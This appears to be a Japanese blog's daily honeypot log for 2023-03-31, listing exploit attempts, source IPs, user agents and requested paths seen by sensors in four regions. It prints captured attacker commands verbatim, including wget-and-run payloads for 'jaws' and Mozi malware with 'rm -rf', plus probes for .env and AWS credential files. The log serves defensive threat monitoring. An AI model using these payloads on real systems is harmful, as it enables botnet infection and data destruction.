2023/03/31 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2023/03/31分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス
curlによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  103.215.81.11/jaws;
chmod /tmp/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget 45.81.243.34/jaws;
sh /tmp/jaws

Location:US

D-link製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
curlによるスキャン行為
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 45.81.243.34/jaws;
sh /tmp/jaws

Location:UK

Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
curlによるスキャン行為
5.188.210.227に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 45.81.243.34/jaws;
sh /tmp/jaws

Location:SG

D-link製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
Gh0stRATのような動き
UserAgentがHello, Worldであるアクセス

を確認しました。

他

アクセス数推移

JP：総アクセス数：256 (前日比：83)
US：総アクセス数：174 (前日比：79)
UK：総アクセス数：93 (前日比：-13)
SG：総アクセス数：111 (前日比：-137)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	18.116.25.173	United States
1	20.212.198.58	United States
9	34.87.69.208	United States
2	35.89.0.80	United States
17	43.154.141.71	Singapore
1	45.55.0.13	United States
1	45.56.108.128	United States
1	45.79.172.21	United States
2	45.79.181.94	United States
1	45.79.181.104	United States
1	45.81.243.34	Bulgaria
1	45.128.232.149	Bulgaria
1	51.77.247.119	France
1	52.91.215.177	United States
1	54.146.241.99	United States
1	59.23.58.206	South Korea
1	66.115.189.137	United States
2	74.82.47.3	United States
1	79.133.51.221	Germany
2	104.248.33.26	United States
1	111.61.214.138	China
1	117.211.36.145	India
1	117.220.111.78	India
2	129.146.125.219	United States
9	135.125.217.54	France
9	135.125.246.189	France
7	143.110.181.243	United States
1	157.245.110.196	United States
6	159.89.170.140	United States
1	159.203.127.62	United States
1	165.22.180.45	United States
1	167.94.138.36	United States
1	167.94.138.52	United States
1	172.104.11.34	United States
1	172.104.11.51	United States
1	172.105.128.11	United States
1	172.105.128.13	United States
4	183.208.49.214	China
142	185.134.23.83	United Kingdom
2	185.209.160.120	Estonia
3	185.254.196.173	Ukraine
1	192.155.90.220	United States
1	192.241.218.38	United States
9	193.32.162.159	Romania
1	213.214.69.146	Bulgaria

UserAgent一覧

件数	UserAgent
19	`-`
1	`Hello, world`
1	`Mozila/5.0`
2	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
140	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36`
17	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.78`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
4	`Mozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/526.9 (KHTML, like Gecko) Version/4.0dp1 Safari/526.8`
24	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (compatible; Konqueror/4.1; OpenBSD) KHTML/4.1.4 (like Gecko)`
2	`Mozilla/5.0 zgrab/0.x`
2	`Mozilla/5.0`
9	`Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36`
2	`Python-urllib/3.9`
1	`curl/7.64.0`
2	`python-requests/2.25.1`
2	`python-requests/2.28.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_18.179.20.5_80\n`
14		`\x16\x03\x01`
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.env.bak`	HTTP/1.1
2	GET	`/.env.development`	HTTP/1.1
2	GET	`/.env.dist`	HTTP/1.1
2	GET	`/.env.old`	HTTP/1.1
2	GET	`/.env.prod`	HTTP/1.1
2	GET	`/.env.production`	HTTP/1.1
2	GET	`/.env.project`	HTTP/1.1
2	GET	`/.env.save`	HTTP/1.1
27	GET	`/.env`	HTTP/1.1
2	GET	`/.git/HEAD`	HTTP/1.1
5	GET	`/.git/config`	HTTP/1.1
2	GET	`/.json`	HTTP/1.1
2	GET	`/?phpinfo=1`	HTTP/1.1
3	GET	`/_profiler/phpinfo`	HTTP/1.1
2	GET	`/admin-app/.env`	HTTP/1.1
2	GET	`/api/.env`	HTTP/1.1
1	GET	`/apis/apps/v1/namespaces/kube-system/daemonsets`	HTTP/1.1
2	GET	`/app/.env`	HTTP/1.1
2	GET	`/application/.env`	HTTP/1.1
2	GET	`/apps/.env`	HTTP/1.1
1	GET	`/auth.asp`	HTTP/1.1
1	GET	`/aws.yml`	HTTP/1.1
2	GET	`/back/.env`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=adminisp&psd=adminisp`	HTTP/1.0
2	GET	`/client/get_targets`	HTTP/1.1
2	GET	`/cms/.env`	HTTP/1.1
1	GET	`/config.js`	HTTP/1.1
2	GET	`/config.json`	HTTP/1.1
1	GET	`/config/aws.yml`	HTTP/1.1
2	GET	`/core/.env`	HTTP/1.1
2	GET	`/cp/.env`	HTTP/1.1
2	GET	`/debug/default/view?panel=config`	HTTP/1.1
2	GET	`/development/.env`	HTTP/1.1
9	GET	`/dispatch.asp`	HTTP/1.1
2	GET	`/docker/.env`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
2	GET	`/enviroments/.env.production`	HTTP/1.1
2	GET	`/enviroments/.env`	HTTP/1.1
7	GET	`/favicon.ico`	HTTP/1.1
2	GET	`/fedex/.env`	HTTP/1.1
2	GET	`/frontend_dev.php/$`	HTTP/1.1
2	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/image/lgbg.jpg`	HTTP/1.1
3	GET	`/info.php`	HTTP/1.1
2	GET	`/laravel/.env`	HTTP/1.1
2	GET	`/live_env`	HTTP/1.1
2	GET	`/local/.env`	HTTP/1.1
1	GET	`/login.rsp`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
3	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
2	GET	`/private/.env`	HTTP/1.1
2	GET	`/rest/.env`	HTTP/1.1
2	GET	`/script/.env`	HTTP/1.1
1	GET	`/sendgrid.env`	HTTP/1.1
2	GET	`/shared/.env`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 103.215.81.11/jaws;chmod+/tmp/jaws;sh+/tmp/jaws`
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+45[.]81[.]243[.]34/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/skin/default_1/images/logo.png`	HTTP/1.1
2	GET	`/sources/.env`	HTTP/1.1
2	GET	`/system/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
2	GET	`/upl.php`	HTTP/1.1
17	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
2	POST	`/.env.development`	HTTP/1.1
2	POST	`/.env.dist`	HTTP/1.1
2	POST	`/.env.old`	HTTP/1.1
2	POST	`/.env.prod`	HTTP/1.1
2	POST	`/.env.production`	HTTP/1.1
2	POST	`/.env.project`	HTTP/1.1
2	POST	`/.env.save`	HTTP/1.1
2	POST	`/.env`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
2	POST	`/admin-app/.env`	HTTP/1.1
2	POST	`/api/.env`	HTTP/1.1
3	POST	`/app/.env`	HTTP/1.1
2	POST	`/application/.env`	HTTP/1.1
2	POST	`/apps/.env`	HTTP/1.1
2	POST	`/back/.env`	HTTP/1.1
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
2	POST	`/cms/.env`	HTTP/1.1
2	POST	`/core/.env`	HTTP/1.1
2	POST	`/cp/.env`	HTTP/1.1
2	POST	`/development/.env`	HTTP/1.1
2	POST	`/docker/.env`	HTTP/1.1
2	POST	`/enviroments/.env.production`	HTTP/1.1
2	POST	`/enviroments/.env`	HTTP/1.1
2	POST	`/fedex/.env`	HTTP/1.1
2	POST	`/laravel/.env`	HTTP/1.1
2	POST	`/live_env`	HTTP/1.1
2	POST	`/local/.env`	HTTP/1.1
1	POST	`/mgmt/tm/util/bash`	HTTP/1.1
2	POST	`/private/.env`	HTTP/1.1
2	POST	`/rest/.env`	HTTP/1.1
2	POST	`/script/.env`	HTTP/1.1
2	POST	`/shared/.env`	HTTP/1.1
2	POST	`/sources/.env`	HTTP/1.1
2	POST	`/system/.env`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.10.221.183	United States
1	18.116.25.173	United States
48	20.171.51.104	United States
1	27.43.123.98	China
7	35.216.169.119	United States
2	45.79.128.205	United States
1	45.79.181.223	United States
2	45.79.181.251	United States
2	45.227.254.48	Belize
1	46.118.97.13	Ukraine
1	51.77.247.119	France
22	51.79.29.48	Canada
1	54.91.232.174	United States
1	54.234.136.64	United States
1	66.115.189.137	United States
1	66.249.73.81	United States
10	69.167.22.230	United States
2	91.228.127.69	Israel
6	95.214.235.216	Ukraine
1	107.170.248.10	United States
1	143.110.249.129	United States
2	152.89.196.54	Russia
7	159.89.170.140	United States
2	162.142.125.217	United States
2	167.94.138.127	United States
7	170.64.146.19	United States
1	172.104.11.34	United States
1	172.104.11.46	United States
1	172.104.11.51	United States
1	172.105.128.12	United States
1	172.105.128.13	United States
2	184.105.139.70	United States
2	185.209.160.120	Estonia
1	185.225.74.42	Bulgaria
8	185.254.196.223	Ukraine
1	192.34.62.232	United States
1	192.155.90.118	United States
10	193.32.162.159	Romania
1	193.35.18.122	Bulgaria
1	195.226.194.70	Russia
1	203.115.85.154	India
7	209.97.180.252	United States
1	212.224.86.124	Germany

UserAgent一覧

件数	UserAgent
30	`-`
1	`Go-http-client/1.1`
1	`Hello, world`
2	`Java/1.8.0_212`
6	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr`
48	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0`
1	`Mozilla/5.0 (X11; Linux i686; rv:49.0) Gecko/20100101 Firefox/49.0`
36	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (compatible; Googlebot/2.1; +http[:]//www[.]google[.]com/bot.html)`
1	`Mozilla/5.0 (compatible; Konqueror/4.1; OpenBSD) KHTML/4.1.4 (like Gecko)`
1	`Mozilla/5.0 zgrab/0.x`
3	`Mozilla/5.0`
1	`curl/7.64.0`
2	`python-requests/2.25.1`
1	`xxx`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_34.68.118.83_80\n`
3		`\x03`
22		`\x16\x03\x01`
1	CONNECT	`google[.]com:443`	HTTP/1.1
3	GET	`/.env.backup`	HTTP/1.1
3	GET	`/.env.local`	HTTP/1.1
3	GET	`/.env.save`	HTTP/1.1
40	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
4	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
3	GET	`/API/.env`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
3	GET	`/admin/.env`	HTTP/1.1
2	GET	`/api.json`	HTTP/1.1
3	GET	`/api/.env`	HTTP/1.1
1	GET	`/apis/apps/v1/namespaces/kube-system/daemonsets`	HTTP/1.1
3	GET	`/app/.env`	HTTP/1.1
1	GET	`/auth.asp`	HTTP/1.1
3	GET	`/bedesk1.1/.env`	HTTP/1.1
3	GET	`/blog/.env`	HTTP/1.1
3	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
3	GET	`/core/.env`	HTTP/1.1
3	GET	`/database/.env`	HTTP/1.1
3	GET	`/dev/.env`	HTTP/1.1
10	GET	`/dispatch.asp`	HTTP/1.1
3	GET	`/env/.env`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
3	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
3	GET	`/public/.env`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+45[.]81[.]243[.]34/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/telescope/requests`	HTTP/1.1
3	GET	`/test/bedesk1.1/.env`	HTTP/1.1
3	GET	`/upl.php`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	HEAD	`/backup`	HTTP/1.1
1	HEAD	`/bc`	HTTP/1.1
1	HEAD	`/bk`	HTTP/1.1
1	HEAD	`/home`	HTTP/1.1
1	HEAD	`/main`	HTTP/1.1
1	HEAD	`/new`	HTTP/1.1
1	HEAD	`/old`	HTTP/1.1
1	HEAD	`/wordpress`	HTTP/1.1
1	HEAD	`/wp`	HTTP/1.1
2	POST	`/HNAP1/`	HTTP/1.0
1	POST	`/api/v0/id`	HTTP/1.1
1	POST	`/app/.env`	HTTP/1.1
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.188.210.227	Russia
5	20.151.234.116	United States
1	45.55.131.101	United States
1	45.79.128.205	United States
3	45.79.181.94	United States
2	45.79.181.179	United States
1	51.77.247.119	France
24	51.79.29.48	Canada
8	95.214.235.216	Ukraine
1	104.28.214.49	United States
1	115.74.246.118	Vietnam
1	115.201.3.69	China
1	142.202.240.104	United States
2	152.89.196.54	Russia
2	162.142.125.215	United States
1	162.243.129.13	United States
1	162.243.136.28	United States
1	170.150.172.230	Brazil
1	172.104.11.34	United States
1	172.105.128.11	United States
2	172.105.128.12	United States
2	172.105.128.13	United States
2	185.209.160.120	Estonia
2	185.225.74.42	Bulgaria
8	185.254.196.223	Ukraine
1	191.96.180.12	Chile
1	192.155.90.220	United States
10	193.32.162.159	Romania
2	194.165.16.72	Panama
1	195.226.194.70	Russia
1	198.235.24.143	United States
2	216.218.206.68	United States

UserAgent一覧

件数	UserAgent
20	`-`
3	`Hello, world`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 YaBrowser/23.1.2.987 Yowser/2.5 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
41	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
4	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
2	`Mozilla/5.0 zgrab/0.x`
1	`curl/7.64.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_132.145.66.34_80\n`
3		`\x03`
1		`\x16\x03\x01\x01\t\x01`
14		`\x16\x03\x01`
1	GET	`/.env:443`	HTTP/1.1
1	GET	`/.env:8080`	HTTP/1.1
1	GET	`/.env:8081`	HTTP/1.1
1	GET	`/.env:8082`	HTTP/1.1
1	GET	`/.env:80`	HTTP/1.1
41	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/auth.asp`	HTTP/1.1
10	GET	`/dispatch.asp`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
3	GET	`/shell?cd+/tmp;rm+-rf+*;wget+45[.]81[.]243[.]34/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
1	GET	`http[:]//dyn[.]epicgifs[.]net/test6956.php`	HTTP/1.1
1	POST	`/app/.env`	HTTP/1.1
4	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.252.167.165	United States
1	18.116.25.173	United States
7	20.119.250.210	United States
1	27.45.74.200	China
5	37.139.128.91	Bulgaria
1	45.56.108.128	United States
2	45.79.172.21	United States
3	45.79.181.104	United States
1	45.79.181.223	United States
2	45.79.181.251	United States
1	45.81.243.34	Bulgaria
1	51.79.29.48	Canada
1	51.158.37.186	France
18	54.37.79.75	France
1	54.160.182.107	United States
1	64.62.197.180	United States
1	64.62.197.181	United States
7	64.227.141.88	United States
1	66.240.205.34	United States
1	87.251.64.11	Russia
1	107.170.249.15	United States
2	109.237.97.180	Russia
2	109.237.98.226	Russia
1	121.188.88.70	South Korea
7	134.209.91.125	United States
2	152.89.196.54	Russia
2	161.35.233.14	United States
2	162.142.125.226	United States
2	167.94.138.34	United States
2	167.248.133.36	United States
2	167.248.133.49	United States
1	170.64.138.196	United States
1	172.104.11.4	United States
1	172.104.11.46	United States
1	172.104.11.51	United States
1	172.104.242.173	United States
1	172.105.128.12	United States
1	180.188.241.102	India
1	180.188.243.243	India
3	185.180.143.18	Portugal
2	185.209.160.120	Estonia
1	185.225.74.42	Bulgaria
10	193.32.162.159	Romania
2	194.165.16.72	Panama
1	195.178.120.44	Bulgaria
1	195.226.194.70	Russia
1	198.235.24.155	United States

UserAgent一覧

件数	UserAgent
34	`-`
1	`Hello, World`
2	`Mozila/5.0`
1	`Mozilla/5.0 (Linux; Android 5.1.1; Coolpad 3622A Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36`
6	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
22	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
4	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)`
1	`Mozilla/5.0 zgrab/0.x`
2	`Mozilla/5.0`
2	`Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36`
1	`Nokia6630/1.0 (2.39.15) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1`
1	`python-requests/2.25.1`
2	`python-requests/2.28.2`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$`	HTTP/1.0
1		`Gh0st\xad`
1		`MGLNDD_13.67.44.234_80`
3		`\x03`
2		`\x16\x03\x01\x01H\x01`
19		`\x16\x03\x01`
25	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/0bef`	HTTP/1.0
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/`	HTTP/1.1
1	GET	`/auth.asp`	HTTP/1.1
2	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
10	GET	`/dispatch.asp`	HTTP/1.1
2	GET	`/explore`	HTTP/1.1
8	GET	`/favicon.ico`	HTTP/1.1
2	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/solr/`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
2	GET	`/upl.php`	HTTP/1.1
1	GET	`/web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr`	HTTP/1.1
1	GET	`/webfig/`	HTTP/1.1
2	GET	`/wp-admin/x.php?action=768776e296b6f286f26796e2a72607e2972647`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
2	POST	`/HNAP1/`	HTTP/1.1
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
2	POST	`/upl.php`	HTTP/1.1
4	PRI	`*`	HTTP/2.0